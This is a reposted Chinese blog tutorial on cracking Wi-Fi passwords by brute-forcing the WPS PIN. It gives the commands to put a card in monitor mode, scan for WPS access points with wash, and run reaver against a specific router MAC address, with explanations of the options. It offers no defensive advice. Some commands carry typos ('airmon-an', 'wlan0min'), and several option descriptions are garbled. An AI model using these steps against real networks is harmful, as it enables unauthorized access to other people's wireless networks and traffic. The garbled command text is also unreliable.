无线安全

通过PIN码破解无线密码

字号+ 作者:sn0w 来源:转载 2016-11-27 16:32 我要评论( )

由于WPS存在安全问题,通过PIN码可以直接提取上网密码。而pin码是一个8位的整数,破解过程时间比较短。WPS PIN码的第8位数是一个校验 和,因此黑客只需计算前7位数......

由于WPS存在安全问题,通过PIN码可以直接提取上网密码。而pin码是一个8位的整数,破解过程时间比较短。WPS PIN码的第8位数是一个校验和,因此黑客只需计算前7位数。另外前7位中的前四位和后三位分开认证。所以破解pin码最多只需要1.1万次尝试,顺利的情况下在3小时左右。
 
1.开启无线网卡的监听模式

airmon-an start wlan0

2.通过wash扫描开启了wps的无线ap。

wash -i wlan0min -C

wash参数:
-c, --channel=<num>     信道 默认自动
-o, --out-file=<file>    导出扫描结果
-n, --probes=<num>   扫描附件ap的数量
-D, --daemonize        
-C, --ignore-fcs   忽略帧校验和错误
-5, --5ghz           使用5G频段通道
-s, --scan           使用扫描模式
-u, --survey          使用调查模式默认此项
-P, --output-piped    
-g, --get-chipset                
-h, --help            显示帮助
PIN码破解 - sn0w - 雪花 - sn0w
 
 
3.穷举破解pin码。
reaver -i wlan0mon -b C8:3A:35:43:FE:60 -a -S  -vv -c 1
reaver参数:

 

 -i	 监听后接口称号? ? ? ?
 -b 	APmac地址? ? ? ?
 -a 	主动检测AP最佳配置? ? ? ?
 -S 	利用最小的DH key(能够进步PJ速度)? ? ? ?
 -v-vv 	显示更多的破解信息? ? ? ?
 -d	 delay每穷举一次的闲置时候预设为1秒? ? ? ?
 -t 	timeout每次穷举守候反应的最长时候? ? ? ?
 -c	指定频道能够便当找到信号,如-c1 指定1频道

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Wifi/354.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 实战破解WPA无线网

    实战破解WPA无线网

    2017-03-07 09:26

  • 伪造无线AP社工进行WPA/WPA2无线网络的破解

    伪造无线AP社工进行WPA/WPA2无线网络的破解

    2017-03-07 09:26

  • wifi攻击pineapple之SSL:轻松拿到JD密码

    wifi攻击pineapple之SSL:轻松拿到JD密码

    2016-12-13 15:59

  • 利用WiFi PineApple实现DNS欺骗和输入劫持

    利用WiFi PineApple实现DNS欺骗和输入劫持

    2016-12-13 16:35

网友点评
暂时未开启评论功能~